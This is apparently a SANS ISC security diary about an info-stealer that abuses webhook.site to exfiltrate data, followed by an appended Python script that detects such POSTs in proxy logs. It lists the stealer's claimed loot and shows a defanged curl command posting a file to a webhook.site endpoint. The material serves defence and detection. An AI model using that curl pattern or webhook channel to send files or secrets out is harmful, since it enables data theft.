Last Updated: 2021-12-01 14:23:40 UTC
by Xavier Mertens (Version: 1)
We already reported multiple times that, when you offer an online (cloud) service, there is a good chance that it will be abused for malicious purposes. I spotted an info-stealer that exfiltrates data through webhook.site. Today, many Python scripts use Discord as a C2 communication channel. This time, it is something different, and it looks definitely less suspicious.
webhook.site is an online service that helps you test webhooks. By definition, a webhook is a mechanism that lets an application notify another one through a custom HTTP callback. They are also often used to automate data processing. Webhooks are perfect for receiving JSON data through HTTP POST requests.
- Google Maps Location
- Screenshot of their pc
- All Their Valid Discord Tokens (bypasses betterdiscord's anti-token-grab-protector)
- Password For Discord (You get Their Password if They Update it)
- Their Whole Credit Card (if They Put one in)
- All Their Chrome Passwords And Cookies
How does webhook.site work? When you visit the page, it generates a unique webhook for you. Now you can just watch it and send HTTP POST requests to it. For example, my webhook was:
I sent these requests:
$ echo "This is a far file" >file.txt
$ curl -X POST --data-binary @file.txt hxxps://webhook[.]site/4accef15-fa3b-4926-a853-2b020accd3a2
Data is instantly received by the webhook that the attacker is probably monitoring:
A very efficient and stealthy way to exfiltrate data!
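As an added example (not part of this diary), here is a small Python hunt for this exfiltration pattern in web proxy logs: it flags HTTP POSTs to webhook.site whose path is a UUID endpoint, and aggregates them per client and per webhook token so the token itself can be tracked as an indicator. The log format is an assumed, simplified one (timestamp, client IP, method, URL, status, request body bytes), the sample lines are constructed, and the webhook UUID reused in them is the one shown in the diary.

```python
"""Hunt for data exfiltration through webhook.site endpoints in proxy logs.

The log format and the sample lines below are constructed for this example;
adapt parse_line() to the real format of your proxy (Squid, Zeek http.log, ...).
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Hosts whose per-user endpoints can double as a drop box.
# Assumption: only the service discussed in the diary is listed here.
WATCHED_HOSTS = {"webhook.site"}

# webhook.site endpoints are a UUID directly under the root path.
UUID_PATH = re.compile(
    r"^/([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})/?$", re.I
)

# Assumed log format: <epoch> <client_ip> <method> <url> <status> <request_body_bytes>
LINE = re.compile(
    r"^(?P<ts>\d+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+"
    r"(?P<status>\d{3})\s+(?P<req_bytes>\d+)$"
)

# Constructed sample: one client posts twice to a webhook.site endpoint,
# another only browses the service's front page, a third fetches its own
# endpoint with GET (a developer testing), and a POST goes elsewhere.
SAMPLE_LOG = """\
1638368620 10.0.0.12 GET https://www.example.com/index.html 200 0
1638368621 10.0.0.12 POST https://webhook.site/4accef15-fa3b-4926-a853-2b020accd3a2 200 19
1638368622 10.0.0.12 POST https://webhook.site/4accef15-fa3b-4926-a853-2b020accd3a2 200 524288
1638368630 10.0.0.13 GET https://webhook.site/ 200 0
1638368650 10.0.0.15 GET https://webhook.site/11111111-2222-3333-4444-555555555555 200 0
1638368660 10.0.0.12 POST https://api.example.com/upload 200 1024
"""


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = int(rec["ts"])
    rec["req_bytes"] = int(rec["req_bytes"])
    return rec


def webhook_token(url):
    """Return the webhook UUID if url is a watched host's endpoint, else None.

    Defanged URLs (hxxps://, [.]) are accepted so IoCs can be pasted as-is.
    """
    url = url.replace("hxxp", "http").replace("[.]", ".")
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    if host not in WATCHED_HOSTS and not any(host.endswith("." + h) for h in WATCHED_HOSTS):
        return None
    m = UUID_PATH.match(parsed.path)
    return m.group(1).lower() if m else None


def find_exfil(log_text, min_bytes=1):
    """Aggregate POSTs to watched webhook endpoints per (client, token)."""
    hits = defaultdict(lambda: {"requests": 0, "bytes": 0, "first": None, "last": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["req_bytes"] < min_bytes:
            continue
        token = webhook_token(rec["url"])
        if token is None:
            continue
        h = hits[(rec["client"], token)]
        h["requests"] += 1
        h["bytes"] += rec["req_bytes"]
        h["first"] = rec["ts"] if h["first"] is None else min(h["first"], rec["ts"])
        h["last"] = rec["ts"] if h["last"] is None else max(h["last"], rec["ts"])
    return dict(hits)


if __name__ == "__main__":
    for (client, token), h in find_exfil(SAMPLE_LOG).items():
        print(f"ALERT client={client} token={token} posts={h['requests']} "
              f"bytes={h['bytes']} window={h['first']}-{h['last']}")
```

Only the client that POSTs to a UUID endpoint is reported; plain browsing of webhook.site and GET requests to an endpoint stay quiet, so a developer legitimately testing a webhook does not trip the alert. The token extracted from the alert is the value worth pivoting on across other logs, since it identifies the attacker's mailbox rather than the shared service.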
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant